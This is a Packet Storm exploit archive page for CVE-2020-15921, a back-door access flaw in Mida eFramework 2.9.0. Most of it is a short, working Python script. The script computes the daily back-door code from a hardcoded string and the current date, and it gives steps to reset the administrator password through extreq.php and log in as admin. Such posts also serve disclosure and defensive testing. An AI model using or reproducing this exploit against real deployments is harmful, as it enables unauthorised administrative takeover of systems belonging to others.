what you don't know can hurt you

Mida eFramework 2.9.0 Backdoor Access

Mida eFramework 2.9.0 Backdoor Access
Posted Sep 21, 2020
Authored by elbae

Mida eFramework version 2.9.0 suffers from having a backdoor access vulnerability.

tags | exploit
advisories | CVE-2020-15921
MD5 | e8b7e0eb6e6ebba6c19edb679497ca26

Mida eFramework 2.9.0 Backdoor Access

Change Mirror Download
# Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921


#! /usr/bin/python3
# -*- coding: utf-8 -*-

from datetime import date

def print_disclaimer():
print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
4) The author is not responsible for any possible harm caused by this
material.
---------------------""")

def print_info():
print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access
(CVE-2020-15921)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the
possibility to change the password.
[*] How it works:
1) run the script
2) copy the output to the URL you want to access (i.e.
http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
3) change the password
4) access as admin with the password """)

def main():
print_info()
print_disclaimer()
abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z']
baseString = 'midasoluti' # default value from source code
today = date.today()
dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
retString = ""

for i in range(0,len(baseString)):
n = int(abc.index(baseString[i]))
m = int(dateString[i])
s = n+m
if (s >= len(abc)):
s = m
retString += abc[s]
print("[+] Generated code: {}".format(retString))
print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0}
".format(retString))
print("[?] Example URL: https://target/PDC/extreq.php?code={0}
".format(retString))

if __name__ == '__main__':
main()
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close